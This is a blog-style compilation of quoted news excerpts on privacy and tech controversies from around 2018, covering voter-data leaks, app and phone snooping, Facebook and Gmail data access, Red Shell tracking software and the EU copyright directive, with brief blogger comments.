Robocall Firm Exposes Hundreds of Thousands of US Voters’ Records

Personal details and political affiliations exposed

The server that drew Diachenko’s attention, this time, contained 2,584 files, which the researcher later connected to RoboCent.

The type of user data exposed via Robocent’s bucket included:

⬖  Full Name, suffix, prefix
⬖  Phone numbers (cell and landlines)
⬖  Address with house, street, city, state, zip, precinct
⬖  Political affiliation provided by state, or inferred based on voting history
⬖  Age and birth year
⬖  Gender
⬖  Jurisdiction breakdown based on district, zip code, precinct, county, state
⬖  Demographics based on ethnicity, language, education

Other data found on the servers, but not necessarily personal data, included audio files with prerecorded political messages used for robocalls.

According to RoboCent’s website, the company was not only providing robo-calling services for political surveys and inquiries but was also selling this data in raw format.

“Clients can now purchase voter data directly from their RoboCall provider,” the company’s website reads. “We provide voter files for every need, whether it be for a new RoboCall or simply to update records for door knocking.”

The company sells voter records for a price of 3¢/record. Leaving the core of its business available online on an AWS bucket without authentication is… self-defeating.

Source: Robocall Firm Exposes Hundreds of Thousands of US Voters’ Records

Chinese mobile phone cameras are not-so-secretly recording users’ activities

It has been widely reported that software and web applications made in China are often built with a “backdoor” feature, allowing the manufacturer or the government to monitor and collect data from the user’s device.

But how exactly does the backdoor feature work? Recent discussion among mobile phone users in mainland China has shed some light on the question.

Last month, users of Vivo NEX, a Chinese Android phone, found that when they opened certain applications on the phone, including Chinese internet giant QQ browser and travel booking app Ctrip, the mobile device’s camera would self-activate.

Different from most mobile phones, where a camera can be activated without giving the user any signal, the Vivo NEX has a tiny retractable camera that physically pops out from the top of the device when it is turned on.

Vivo NEX retractable camera. Photo by Vivo NEX, via We Chaat.

Though perhaps unintentionally, this design feature has given Chinese mobile users a tangible sense of exactly when and how they are being monitored.

One Weibo user observed that the retractable camera self-activates whenever he opens a new chat on Telegram, a messaging application designed for secured and encrypted communication.

While Telegram reacted quickly to reports of the issue and fixed the camera bug, Chinese internet giant Tencent instead defended the feature, arguing that its QQ browser needs the camera activated to prepare for scanning QR codes and insisted that the camera would not take photos or audio recordings unless the user told it to do so.

This explanation was not reassuring for users, as it only revealed the degree to which the QQ browser could record users’ activities.

After the news of the self-activated camera bug spread, users started testing the issue on other applications and found that Baidu’s voice input application has access to both the camera and voice recording function, which can be launched without users’ authorization.

A Vivo NEX user found that once she had installed Baidu’s voice input system, it would activate the phone’s camera and sound recording function whenever the user opened any application — including chat apps, browsers — that allows the user to input text.

Baidu says that the self-activated recording is not a backdoor but a “frontdoor” application that allows the company collect and adjust to background noise so as to prepare for and optimize its voice input function. This was not reassuring for users — any microphone collecting background noise would also unquestionably capture the voices and conversations of a user and whomever she speaks with face-to-face.

How does camera snooping affect people outside China?

These snooping features have not just affected people from mainland China, but all of those from outside the country who want to communicate with friends in China.

As the Chinese government has blocked most leading foreign social media technologies, anyone who wants to communicate with people in China has little choice but to install applications made in China, such as WeChat.

One strategy for increasing one’s mobile privacy when using Chinese-made applications is to keep all insecure applications on one device and assume that these communications will be recorded or spied upon, and to keep a second device for more secure or “clean” applications. When using an encrypted communication application like Telegram to communicate with friends in China, one also has to make sure that their friends’ mobile devices are clean.

Baidu has been notorious for snooping into users’ private data and activities. In January 2018, a government-affiliated consumer association in Jiangsu province filed a lawsuit against Baidu’s search application and mobile browser for snooping on users’ phone conversations and accessing their geo-location data without user consent. But the case was dropped in March after Baidu updated its applications by securing users’ consent for control over their mobile camera, voice recording, geo-location data, even though these controls are not essential to the application’s functionality.

In response to public concern about these backdoor features, Baidu and other Chinese internet giants may defend themselves simply by arguing that users have consented to having their cameras activated. But given the monopolistic nature of Chinese Internet giants in the country, do ordinary users have the power — or the choice — to say no?

Source: Chinese mobile phone cameras are not-so-secretly recording users’ activities – Global Voices Advox

Controversial copyright law rejected by EU parliament

A controversial overhaul of the EU’s copyright law that sparked a fierce debate between internet giants and content creators has been rejected.

The proposed rules would have put more responsibility on websites to check for copyright infringements, and forced platforms to pay for linking to news.

A slew of high-profile music stars had backed the change, arguing that websites had exploited their content.

But opponents said the rules would stifle internet freedom and creativity.

The move was intended to bring the EU’s copyright laws in line with the digital age, but led to protests from websites and much debate before it was rejected by a margin of 318-278 in the European Parliament on Thursday.

What were they voting for?

The proposed legislation – known as the Copyright Directive – was an attempt by the EU to modernise its copyright laws, but it contained two highly-contested parts.

The first of these, Article 11, was intended to protect newspapers and other outlets from internet giants like Google and Facebook using their material without payment.

But it was branded a “link tax” by opponents who feared it could lead to problems with sentence fragments being used to link to other news outlets (like this).

Article 13 was the other controversial part. It put a greater responsibility on websites to enforce copyright laws, and would have meant that any online platform that allowed users to post text, images, sounds or code would need a way to assess and filter content.

The most common way to do this is by using an automated copyright system, but they are expensive. The one YouTube uses cost $60m (£53m), so critics were worried that similar filters would need to be introduced to every website if Article 13 became law.

There were also concerns that these copyright filters could effectively ban things like memes and remixes which use some copyrighted material.

Source: Controversial copyright law rejected by EU parliament – BBC News

Very glad to see common sense prevailing here. Have you ever thought about how strange it would  be if you could bill someone every time they read your email or your reports? How do musicians think it’s ok to bill people when they are not playing?

App Traps: How Cheap Smartphones Siphon User Data in Developing Countries

For millions of people buying inexpensive smartphones in developing countries where privacy protections are usually low, the convenience of on-the-go internet access could come with a hidden cost: preloaded apps that harvest users’ data without their knowledge.

One such app, included on thousands of Chinese-made Singtech P10 smartphones sold in Myanmar and Cambodia, sends the owner’s location and unique-device details to a mobile-advertising firm in Taiwan called General Mobile Corp., or GMobi. The app also has appeared on smartphones sold in Brazil and those made by manufacturers based in China and India, security researchers said.

Taipei-based GMobi, with a subsidiary in Shanghai, said it uses the data to show targeted ads on the devices. It also sometimes shares the data with device makers to help them learn more about their customers.

Smartphones have been billed as a transformative technology in developing markets, bringing low-cost internet access to hundreds of millions of people. But this growing population of novice consumers, most of them living in countries with lax or nonexistent privacy protections, is also a juicy target for data harvesters, according to security researchers.

Smartphone makers that allow GMobi to install its app on phones they sell are able to use the app to send software updates for their devices known as “firmware” at no cost to them, said GMobi Chief Executive Paul Wu. That benefit is an important consideration for device makers pushing low-cost phones across emerging markets.

“If end users want a free internet service, he or she needs to suffer a little for better targeting ads,” said a GMobi spokeswoman.

[…]

Upstream Systems, a London-based mobile commerce and security firm that identified the GMobi app’s activity and shared it with the Journal, said it bought four new devices that, once activated, began sending data to GMobi via its firmware-updating app. This included 15-digit International Mobile Equipment Identification, or IMEI, numbers, along with unique codes called MAC addresses that are assigned to each piece of hardware that connects to the web. The app also sends some location data to GMobi’s servers located in Singapore, Upstream said.

Source: App Traps: How Cheap Smartphones Siphon User Data in Developing Countries – WSJ

 

I like the way even GMobi thinks users getting targetted advertising are suffering!

Mitsubishi Wants Your Driving Data, and It’s Willing to Throw in a Free Cup of Coffee to Get It

Automakers want in on the highly lucrative big data game and Mitsubishi is willing to pay for the privilege. In exchange for running the risk of jacking up its customers’ insurance premiums, the car manufacturer is offering drivers $10 off of an oil change and other rewards. Consumers will have to decide if a gift card is worth giving up their privacy.

According to the Wall Street Journal, Mitsubishi’s new smartphone app is the first of its kind. A driver can sign up and allow their driving habits to be tracked by their phone’s sensors, which monitor data points like acceleration, location, and rotation. Along the way, they’ll earn badges (reward points) based on good driving practices like staying under the speed limit. For now, the badges can be exchanged for discounted oil changes or car accessories, but the company plans to expand its incentives to other small perks like free cups of coffee by the end of the year.

It may seem like a win-win situation: You pay a little more attention to being a good driver and you get a little bonus for your efforts. But the first customer for all that data is State Auto Insurance Companies, which will be using it to create better risk models and adjust users’ premiums accordingly. It doesn’t appear that the data will be anonymized because the Journal reports that, after a trial period, insurers will be able to build a customer risk profile on users of the app that will then be used to determine rates. We reached out to Mitsubishi to ask about its anonymization of data but didn’t receive an immediate reply.

Mike LaRocco, State Auto’s CEO, framed this as a benefit to consumers when speaking with the Journal. “They’ll get a much more accurate quote from day one,” he claimed. That might be true, but it does nothing to assuage fears that insurance companies could penalize drivers who don’t voluntarily give up their data.

Ford also has an app that shares data with insurance companies, but it’s not offering any of those sweet, sweet gift cards. And at a moment when many people are debating whether tech giants should be paying us for our data, one could argue that Mitsubishi is doing the right thing. But as car companies are building web connectivity into their new models, we could easily see this become standard practice without offering drivers a choice or a reward. A study by McKinsey & Co from 2016, estimated that monetizing car data could be worth between $450-750 billion by 2030. Of course, autonomous vehicles could become more prevalent by then. And as long as they work as promised, insurance companies will be less necessary.

[Wall Street Journal]

Source: Mitsubishi Wants Your Driving Data, and It’s Willing to Throw in a Free Cup of Coffee to Get It

‘Plane Hacker’ Roberts: I put a network sniffer on my truck to see what it was sharing. Holy crap!

Cars are turning into computers on wheels and airplanes have become flying data centres, but this increase in power and connectivity has largely happened without designing in adequate security controls.

Improving transportation security was a major strand of the recent Cyber Week security conference in Israel. A one-day event, Speed of Light, focused on transportation cybersecurity, where Roberts served as master of ceremonies.

[…]

“Israel was here, not just a couple of companies. Israel is going, ‘We as a state, we as a country, need to understand [about transportation security]’,” Roberts said. “We need to learn.”

“In other places it’s the companies. GM is great. Ford is good. Some of the Germany companies are good. Fiat-Chrysler Group has got a lot of work to do.”

Some industries are more advanced than others at understanding cybersecurity risks, Roberts claimed. For example, awareness in the automobile industry is ahead of that found in aviation.

“Boeing is in denial. Airbus is kind of on the fence. Some of the other industries are better.”

[…]

There’s almost nothing you can do [as a user] to improve car security. The only thing you can do is go back to the garage every month for your Microsoft Patch Tuesday – updates from Ford or GM.

“You better come in once a month for your patches because if you don’t, the damn thing is not going to work.”

What about over-the-air updates? These may not always be reliable, Roberts warned.

“What happens if you’re in the middle of a dead spot? Or you’re in the middle of a developing country that doesn’t have that? What about the Toyotas that get sold to the Middle East or Far East, to countries that don’t have 4G or 5G coverage. And what happens when you move around countries?”

[…]

“I put a network sniffer on the big truck to see what it was sharing. Holy crap! The GPS, the telemetry, the tracking. There’s a lot of data this thing is sharing.

“If you turn it off you might be voiding warranties or [bypassing] security controls,” Roberts said, adding that there was also an issue about who owns the data a car generates. “Is it there to protect me or monitor me?” he mused.

Some insurance firms offer cheaper insurance to careful drivers, based on readings from telemetry devices and sensors. Roberts is dead set against this for privacy reasons. “Insurance can go to hell. For me, getting a 5 per cent discount on my insurance is not worth accepting a tracking device from an insurance company.”

Source: ‘Plane Hacker’ Roberts: I put a network sniffer on my truck to see what it was sharing. Holy crap! • The Register

Is Facebook a publisher? In public it says no, but in court it says yes

Facebook has long had the same public response when questioned about its disruption of the news industry: it is a tech platform, not a publisher or a media company.

But in a small courtroom in California’s Redwood City on Monday, attorneys for the social media company presented a different message from the one executives have made to Congress, in interviews and in speeches: Facebook, they repeatedly argued, is a publisher, and a company that makes editorial decisions, which are protected by the first amendment.

The contradictory claim is Facebook’s latest tactic against a high-profile lawsuit, exposing a growing tension for the Silicon Valley corporation, which has long presented itself as neutral platform that does not have traditional journalistic responsibilities.

The suit, filed by an app startup, alleges that Mark Zuckerberg developed a “malicious and fraudulent scheme” to exploit users’ personal data and force rival companies out of business. Facebook, meanwhile, is arguing that its decisions about “what not to publish” should be protected because it is a “publisher”.

In court, Sonal Mehta, a lawyer for Facebook, even drew comparison with traditional media: “The publisher discretion is a free speech right irrespective of what technological means is used. A newspaper has a publisher function whether they are doing it on their website, in a printed copy or through the news alerts.”

The plaintiff, a former startup called Six4Three, first filed the suit in 2015 after Facebook removed app developers’ access to friends’ data. The company had built a controversial and ultimately failed app called Pikinis, which allowed people to filter photos to find ones with people in bikinis and other swimwear.

Six4Three attorneys have alleged that Facebook enticed developers to create apps for its platform by implying creators would have long-term access to the site’s huge amounts of valuable personal data and then later cut off access, effectively defrauding them. The case delves into some of the privacy concerns sparked by the Cambridge Analytica scandal.

Source: Is Facebook a publisher? In public it says no, but in court it says yes | Technology | The Guardian

More on how social media hacks brains to addict users

In a followup to How programmers addict you to social media, games and your mobile phone

Ex-Facebook president Sean Parker: site made to exploit human ‘vulnerability’

He explained that when Facebook was being developed the objective was: “How do we consume as much of your time and conscious attention as possible?” It was this mindset that led to the creation of features such as the “like” button that would give users “a little dopamine hit” to encourage them to upload more content.

“It’s a social-validation feedback loop … exactly the kind of thing that a hacker like myself would come up with, because you’re exploiting a vulnerability in human psychology.”

[…]

Parker is not the only Silicon Valley entrepreneur to express regret over the technologies he helped to develop. The former Googler Tristan Harris is one of several techies interviewed by the Guardian in October to criticize the industry.

“All of us are jacked into this system,” he said. “All of our minds can be hijacked. Our choices are not as free as we think they are.”

Aza Raskin on Google Search Results and How He Invented the Infinite Scroll

Social media apps are ‘deliberately’ addictive to users

Social media companies are deliberately addicting users to their products for financial gain, Silicon Valley insiders have told the BBC’s Panorama programme.

“It’s as if they’re taking behavioural cocaine and just sprinkling it all over your interface and that’s the thing that keeps you like coming back and back and back”, said former Mozilla and Jawbone employee Aza Raskin.

“Behind every screen on your phone, there are generally like literally a thousand engineers that have worked on this thing to try to make it maximally addicting” he added.

In 2006 Mr Raskin, a leading technology engineer himself, designed infinite scroll, one of the features of many apps that is now seen as highly habit forming. At the time, he was working for Humanized – a computer user-interface consultancy.

Image caption Aza Raskin says he did not recognise how addictive infinite scroll could be

Infinite scroll allows users to endlessly swipe down through content without clicking.

“If you don’t give your brain time to catch up with your impulses,” Mr Raskin said, “you just keep scrolling.”

He said the innovation kept users looking at their phones far longer than necessary.

Mr Raskin said he had not set out to addict people and now felt guilty about it.

But, he said, many designers were driven to create addictive app features by the business models of the big companies that employed them.

“In order to get the next round of funding, in order to get your stock price up, the amount of time that people spend on your app has to go up,” he said.

“So, when you put that much pressure on that one number, you’re going to start trying to invent new ways of getting people to stay hooked.”

Is My Phone Recording Everything I Say? It turns out it sends screenshots and videos of what you do

Some computer science academics at Northeastern University had heard enough people talking about this technological myth that they decided to do a rigorous study to tackle it. For the last year, Elleen Pan, Jingjing Ren, Martina Lindorfer, Christo Wilson, and David Choffnes ran an experiment involving more than 17,000 of the most popular apps on Android to find out whether any of them were secretly using the phone’s mic to capture audio. The apps included those belonging to Facebook, as well as over 8,000 apps that send information to Facebook.

Sorry, conspiracy theorists: They found no evidence of an app unexpectedly activating the microphone or sending audio out when not prompted to do so. Like good scientists, they refuse to say that their study definitively proves that your phone isn’t secretly listening to you, but they didn’t find a single instance of it happening. Instead, they discovered a different disturbing practice: apps recording a phone’s screen and sending that information out to third parties.

Of the 17,260 apps the researchers looked at, over 9,000 had permission to access the camera and microphone and thus the potential to overhear the phone’s owner talking about their need for cat litter or about how much they love a certain brand of gelato. Using 10 Android phones, the researchers used an automated program to interact with each of those apps and then analyzed the traffic generated. (A limitation of the study is that the automated phone users couldn’t do things humans could, like creating usernames and passwords to sign into an account on an app.) They were looking specifically for any media files that were sent, particularly when they were sent to an unexpected party.

These phones played with thousands of app to see if they could find one that would secretly activate their microphone
Photo: David Choffnes (Northeastern University)

The strange practice they started to see was that screenshots and video recordings of what people were doing in apps were being sent to third party domains. For example, when one of the phones used an app from GoPuff, a delivery start-up for people who have sudden cravings for junk food, the interaction with the app was recorded and sent to a domain affiliated with Appsee, a mobile analytics company. The video included a screen where you could enter personal information—in this case, their zip code.

[…]

In other words, until smartphone makers notify you when your screen is being recorded or give you the power to turn that ability off, you have a new thing to be paranoid about. The researchers will be presenting their work at the Privacy Enhancing Technology Symposium Conference in Barcelona next month. (While in Spain, they might want to check out the country’s most popular soccer app, which has given itself permission to access users’ smartphone mics to listen for illegal broadcasts of games in bars.)

The researchers weren’t comfortable saying for sure that your phone isn’t secretly listening to you in part because there are some scenarios not covered by their study. Their phones were being operated by an automated program, not by actual humans, so they might not have triggered apps the same way a flesh-and-blood user would. And the phones were in a controlled environment, not wandering the world in a way that might trigger them: For the first few months of the study the phones were near students in a lab at Northeastern University and thus surrounded by ambient conversation, but the phones made so much noise, as apps were constantly being played with on them, that they were eventually moved into a closet. (If the researchers did the experiment again, they would play a podcast on a loop in the closet next to the phones.) It’s also possible that the researchers could have missed audio recordings of conversations if the app transcribed the conversation to text on the phone before sending it out. So the myth can’t be entirely killed yet.

Source: Is My Phone Recording Everything I Say?

Europe is reading smartphones and using the data as a weapon to deport refugees

Across the continent, migrants are being confronted by a booming mobile forensics industry that specialises in extracting a smartphone’s messages, location history, and even WhatsApp data. That information can potentially be turned against the phone owners themselves.

In 2017 both Germany and Denmark expanded laws that enabled immigration officials to extract data from asylum seekers’ phones. Similar legislation has been proposed in Belgium and Austria, while the UK and Norway have been searching asylum seekers’ devices for years.

Following right-wing gains across the EU, beleaguered governments are scrambling to bring immigration numbers down. Tackling fraudulent asylum applications seems like an easy way to do that. As European leaders met in Brussels last week to thrash out a new, tougher framework to manage migration —which nevertheless seems insufficient to placate Angela Merkel’s critics in Germany— immigration agencies across Europe are showing new enthusiasm for laws and software that enable phone data to be used in deportation cases.

Admittedly, some refugees do lie on their asylum applications. Omar – not his real name – certainly did. He travelled to Germany via Greece. Even for Syrians like him there were few legal alternatives into the EU. But his route meant he could face deportation under the EU’s Dublin regulation, which dictates that asylum seekers must claim refugee status in the first EU country they arrive in. For Omar, that would mean settling in Greece – hardly an attractive destination considering its high unemployment and stretched social services.

Last year, more than 7,000 people were deported from Germany according to the Dublin regulation. If Omar’s phone were searched, he could have become one of them, as his location history would have revealed his route through Europe, including his arrival in Greece.

But before his asylum interview, he met Lena – also not her real name. A refugee advocate and businesswoman, Lena had read about Germany’s new surveillance laws. She encouraged Omar to throw his phone away and tell immigration officials it had been stolen in the refugee camp where he was staying. “This camp was well-known for crime,” says Lena, “so the story seemed believable.” His application is still pending.

Omar is not the only asylum seeker to hide phone data from state officials. When sociology professor Marie Gillespie researched phone use among migrants travelling to Europe in 2016, she encountered widespread fear of mobile phone surveillance. “Mobile phones were facilitators and enablers of their journeys, but they also posed a threat,” she says. In response, she saw migrants who kept up to 13 different SIM cards, hiding them in different parts of their bodies as they travelled.

[…]

Denmark is taking this a step further, by asking migrants for their Facebook passwords. Refugee groups note how the platform is being used more and more to verify an asylum seeker’s identity.

[…]

The Danish immigration agency confirmed they do ask asylum applicants to see their Facebook profiles. While it is not standard procedure, it can be used if a caseworker feels they need more information. If the applicant refused their consent, they would tell them they are obliged under Danish law. Right now, they only use Facebook – not Instagram or other social platforms.

[…]

“In my view, it’s a violation of ethics on privacy to ask for a password to Facebook or open somebody’s mobile phone,” says Michala Clante Bendixen of Denmark’s Refugees Welcome movement. “For an asylum seeker, this is often the only piece of personal and private space he or she has left.”

Information sourced from phones and social media offers an alternative reality that can compete with an asylum seeker’s own testimony. “They’re holding the phone to be a stronger testament to their history than what the person is ready to disclose,” says Gus Hosein, executive director of Privacy International. “That’s unprecedented.”

Privacy campaigners note how digital information might not reflect a person’s character accurately. “Because there is so much data on a person’s phone, you can make quite sweeping judgements that might not necessarily be true,” says Christopher Weatherhead, technologist at Privacy International.

[…]

Privacy International has investigated the UK police’s ability to search phones, indicating that immigration officials could possess similar powers. “What surprised us was the level of detail of these phone searches. Police could access information even you don’t have access to, such as deleted messages,” Weatherhead says.

His team found that British police are aided by Israeli mobile forensic company Cellebrite. Using their software, officials can access search history, including deleted browsing history. It can also extract WhatsApp messages from some Android phones.

Source: Europe is using smartphone data as a weapon to deport refugees | WIRED UK

Google allows outside app developers to read people’s Gmails

  • Google promised a year ago to provide more privacy to Gmail users, but The Wall Street Journal reports that hundreds of app makers have access to millions of inboxes belonging to Gmail users.
  • The outside app companies receive access to messages from Gmail users who signed up for things like price-comparison services or automated travel-itinerary planners, according to The Journal.
  • Some of these companies train software to scan the email, while others enable their workers to pore over private messages, the report says.
  • What isn’t clear from The Journal’s story is whether Google is doing anything differently than Microsoft or other rival email services.

Employees working for hundreds of software developers are reading the private messages of Gmail users, The Wall Street Journal reported on Monday.

A year ago, Google promised to stop scanning the inboxes of Gmail users, but the company has not done much to protect Gmail inboxes obtained by outside software developers, according to the newspaper. Gmail users who signed up for “email-based services” like “shopping price comparisons,” and “automated travel-itinerary planners” are most at risk of having their private messages read, The Journal reported.

Hundreds of app developers electronically “scan” inboxes of the people who signed up for some of these programs, and in some cases, employees do the reading, the paper reported. Google declined to comment.

The revelation comes at a bad time for Google and Gmail, the world’s largest email service, with 1.4 billion users. Top tech companies are under pressure in the United States and Europe to do more to protect user privacy and be more transparent about any parties with access to people’s data. The increased scrutiny follows the Cambridge Analytica scandal, in which a data firm was accused of misusing the personal information of more than 80 million Facebook users in an attempt to sway elections.

It’s not news that Google and many top email providers enable outside developers to access users’ inboxes. In most cases, the people who signed up for the price-comparison deals or other programs agreed to provide access to their inboxes as part of the opt-in process.

gmail opti-in
Gmail’s opt-in alert spells out generally what a user is agreeing to.
Google

In Google’s case, outside developers must pass a vetting process, and as part of that, Google ensures they have an acceptable privacy agreement, The Journal reported, citing a Google representative.

What is unclear is how closely these outside developers adhere to their agreements and whether Google does anything to ensure they do, as well as whether Gmail users are fully aware that individual employees may be reading their emails, as opposed to an automated system, the report says.

Mikael Berner, the CEO of Edison Software, a Gmail developer that offers a mobile app for organizing email, told The Journal that its employees had read emails from hundreds of Gmail users as part of an effort to build a new feature. An executive at another company said employees’ reading of emails had become “common practice.”

Companies that spoke to The Journal confirmed that the practice was specified in their user agreements and said they had implemented strict rules for employees regarding the handling of email.

It’s interesting to note that, judging from The Journal’s story, very little indicates that Google is doing anything different from Microsoft or other top email providers. According to the newspaper, nothing in Microsoft or Yahoo’s policy agreements explicitly allows people to read others’ emails.

Source: Google reportedly allows outside app developers to read people’s Gmails – INSIDER

Which also shows: no one ever reads the end user agreements. I’m pretty sure no-one got the bit where it said: you are also allowing us to read all your emails when they signed up

Dear Samsung mobe owners: It may leak your private pics to randoms

Samsung’s Messages app bundled with the South Korean giant’s latest smartphones and tablets may silently send people’s private photos to random contacts, it is claimed.

An unlucky bunch of Sammy phone fans – including owners of Galaxy S9, S9+ and Note 8 gadgets – have complained on Reddit and the official support forums that the application texted their snaps without permission.

One person said the app sent their photo albums to their girlfriend at 2.30am without them knowing – there was no trace of the transfer on the phone, although it showed up in their T-Mobile US account. The pictures, like the recipients, are seemingly picked at random from handheld’s contacts, and the messages do not appear in the application’s sent box. The seemingly misbehaving app is the default messaging tool on Samsung’s Android devices.

“Last night around 2:30am, my phone sent [my girlfriend] my entire photo gallery over text but there was no record of it on my messages app,” complained one confused Galaxy S9+ owner. “However, there was record of it [in my] T-Mobile logs.”

Another S9+ punter chipped in: “Oddly enough, my wife’s phone did that last night, and mine did it the night before. I think it has something to do with the Samsung SMS app being updated from the Galaxy Store. When her phone texted me her gallery, it didn’t show up on her end – and vice versa.”

Source: Dear Samsung mobe owners: It may leak your private pics to randoms • The Register

This popular Facebook app publicly exposed your data for years

Nametests.com, the website behind the quizzes, recently fixed a flaw that publicly exposed information of their more than 120 million monthly users — even after they deleted the app. At my request, Facebook donated $8,000 to the Freedom of the Press Foundation as part of their Data Abuse Bounty Program.

[…]

While loading a test, the website would fetch my personal information and display it on the webpage. Here’s where it got my personal information from:

http://nametests.com/appconfig_user

In theory, every website could have requested this data. Note that the data also includes a ‘token’ which gives access to all data the user authorised the application to access, such as photos, posts and friends.

I was shocked to see that this data was publicly available to any third-party that requested it.

In a normal situation, other websites would not be able to access this information. Web browsers have mechanisms in place to prevent that from happening. In this case however, the data was wrapped in something called javascript, which is an exception to this rule.

One of the basic principles of javascript is that it can be shared with other websites. Since NameTests displayed their user’s personal data in javascript file, virtually any website could access it when they would request it.

o verify it would actually be that easy to steal someone’s information, I set up a website that would connect to NameTests and get some information about my visitor. NameTests would also provide a secret key called an access token, which, depending on the permissions granted, could be used to gain access to a visitor’s posts, photos and friends. It would only take one visit to our website to gain access to someone’s personal information for up to two months.

Video proof:

An unauthorised website getting access to my Facebook information

As you can see in the video, NameTests would still reveal your identity even after deleting the app. In order to prevent this from happening, the user would have had to manually delete the cookies on their device, since NameTests.com does not offer a log out functionality.

Source: This popular Facebook app publicly exposed your data for years

Facebook Patent Imagines Triggering Your Phone’s Mic When a Hidden Signal Plays on TV

You may have seen the ads that Facebook has been running on TV in a full-court press to apologize for abusing users privacy. They’re embarrassing. And, it turns out, they may be a sign of things to come. Based on a recently published patent application, Facebook could one day use ads on television to further violate your privacy once you’ve forgotten about all those other times.

First spotted by Metro, the patent is titled “broadcast content view analysis based on ambient audio recording.” (PDF) It describes a system in which an “ambient audio fingerprint or signature” that’s inaudible to the human ear could be embedded in broadcast content like a TV ad. When a hypothetical user is watching this ad, the audio fingerprint could trigger their smartphone or another device to turn on its microphone, begin recording audio and transmit data about it to Facebook.

Diagram of soundwave containing signal, triggering device, and recording ambient audio.
Image: USPTO

Everything in the patent is written in legalese and is a bit vague about what happens to the audio data. One example scenario imagines that various ambient audio would be eliminated and the content playing on the broadcast would be identified. Data would be collected about the user’s proximity to the audio. Then, the identifying information, time, and identity of the Facebook user would be sent to the social media company for further processing.

In addition to all the data users voluntarily give up, and the incidental data it collects through techniques like browser fingerprinting, Facebook would use this audio information to figure out which ads are most effective. For example, if a user walked away from the TV or changed the channel as soon as the ad began to play, it might consider the ad ineffective or on a subject the user doesn’t find interesting. If the user stays where they are and the audio is loud and clear, Facebook could compare that seeming effective ad with your other data to make better suggestions for its advertising clients.

An example of a broadcasting device communicating with the network and identifying various users in a household.
Image: USPTO

Yes, this is creepy as hell and feels like someone trying to make a patent for a peephole on a nondescript painting

Source: Facebook Patent Imagines Triggering Your Phone’s Mic When a Hidden Signal Plays on TV

Facebook, Google, Microsoft scolded for tricking people into spilling their private info

Five consumer privacy groups have asked the European Data Protection Board to investigate how Facebook, Google, and Microsoft design their software to see whether it complies with the General Data Protection Regulation (GDPR).

Essentially, the tech giants are accused of crafting their user interfaces so that netizens are fooled into clicking away their privacy, and handing over their personal information.

In a letter sent today to chairwoman Andrea Jelinek, the BEUC (Bureau Européen des Unions de Consommateurs), the Norwegian Consumer Council (Forbrukerrådet), Consumers International, Privacy International and ANEC (just too damn long to spell out) contend that the three tech giants “employed numerous tricks and tactics to nudge or push consumers toward giving consent to sharing as much data for as many purposes as possible.”

The letter coincides with the publication a Forbrukerrådet report, “Deceived By Design,” that claims “tech companies use dark patterns to discourage us from exercising our rights to privacy.”

Dark patterns here refers to app interface design choices that attempt to influence users to do things they may not want to do because they benefit the software maker.

The report faults Google, Facebook and, to a lesser degree, Microsoft for employing default settings that dispense with privacy. It also says they use misleading language, give users an illusion of control, conceal pro-privacy choices, offer take-it-or-leave it choices and use design patterns that make it more laborious to choose privacy.

It argues that dark patterns deprive users of control, a central requirement under GDPR.

As an example of linguistic deception, the report cites Facebook text that seeks permission to use facial recognition on images:

If you keep face recognition turned off, we won’t be able to use this technology if a stranger uses your photo to impersonate you. If someone uses a screen reader, they won’t be told when you’re in a photo unless you’re tagged.

The way this is worded, the report says, pushes Facebook users to accept facial recognition by suggesting there’s a risk of impersonation if they refuse. And it implies there’s something unethical about depriving those forced to use screen readers of image descriptions, a practice known as “confirmshaming.”

Source: Facebook, Google, Microsoft scolded for tricking people into spilling their private info • The Register

EU breaks internet, starts wholesale censorship for rich man copyright holders

The problems are huge, not least because the EU will implement an automated content filter, which means that memes will die, but also, if you have the money to spam the system with requests, you can basically kill any content you want with the actual content holder only having a marginal chance of navigating EU burocracy in order to regain ownership of their rights.

There goes free speech and innovation.

 

Source: COM_2016_0593_FIN.ENG.xhtml.1_EN_ACT_part1_v5.docx

Red Shell packaged games (Civ VI, Total War, ESO, KSP and more) contain a spyware which tracks your Internet activity outside of the game

Red shell is a Spyware that tracks data of your PC and shares it with 3rd parties. On their website they formulate it all in very harmless language, but the fact is that this is software from someone i don’t trust and whom i never invited, which is looking at my data and running on my pc against my will. This should have no place in a full price PC game, and in no games if it were up to me.

I make this thread to raise awareness of these user unfriendly marketing practices and data mining software that are common on the mobile market, and which are flooding over to our PC Games market. As a person and a gamer i refuse to be data mined. My data is my own and you have no business making money of it.

The announcement yesterday was only from “Holy Potatoes! We’re in Space?!”, but i would consider all their games as on risk to contain that spyware if they choose to include it again, with or without announcement. Also the Publisher of this one title is Daedalic Entertainment, while the others are self published. I would think it could be interesting to check if other Daedalic Entertainment Games have that spyware in it as well. I had no time to do that.

Reddit [PSA] RED SHELL Spyware – “Holy Potatoes! We’re in Space?!” integrated and removed it after complaints

and
[PSA] Civ VI, Total War, ESO, KSP and more contain a spyware which tracks your Internet activity outside of the game (x-post r/Steam)

Addresses to block:
redshell.io
api.redshell.io
treasuredata.com
api.treasuredata.com

EU Copyright law could put end to net memes

Memes, remixes and other user-generated content could disappear online if the EU’s proposed rules on copyright become law, warn experts.

Digital rights groups are campaigning against the Copyright Directive, which the European Parliament will vote on later this month.

The legislation aims to protect rights-holders in the internet age.

But critics say it misunderstands the way people engage with web content and risks excessive censorship.

The Copyright Directive is an attempt to reshape copyright for the internet, in particular rebalancing the relationship between copyright holders and online platforms.

Article 13 states that platform providers should “take measures to ensure the functioning of agreements concluded with rights-holders for the use of their works”.

Critics say this will, in effect, require all internet platforms to filter all content put online by users, which many believe would be an excessive restriction on free speech.

There is also concern that the proposals will rely on algorithms that will be programmed to “play safe” and delete anything that creates a risk for the platform.

A campaign against Article 13 – Copyright 4 Creativity – said that the proposals could “destroy the internet as we know it”.

“Should Article 13 of the Copyright Directive be adopted, it will impose widespread censorship of all the content you share online,” it said.

It is urging users to write to their MEP ahead of the vote on 20 June.

Jim Killock, executive director of the UK’s Open Rights Group, told the BBC: “Article 13 will create a ‘Robo-copyright’ regime, where machines zap anything they identify as breaking copyright rules, despite legal bans on laws that require ‘general monitoring’ of users to protect their privacy.

“Unfortunately, while machines can spot duplicate uploads of Beyonce songs, they can’t spot parodies, understand memes that use copyright images, or make any kind of cultural judgement about what creative people are doing. We see this all too often on YouTube already.

Source: Copyright law could put end to net memes – BBC News

Facebook gave some companies special access to data on users’ friends

Facebook granted a select group of companies special access to its users’ records even after the point in 2015 that the company has claimed it stopped sharing such data with app developers.

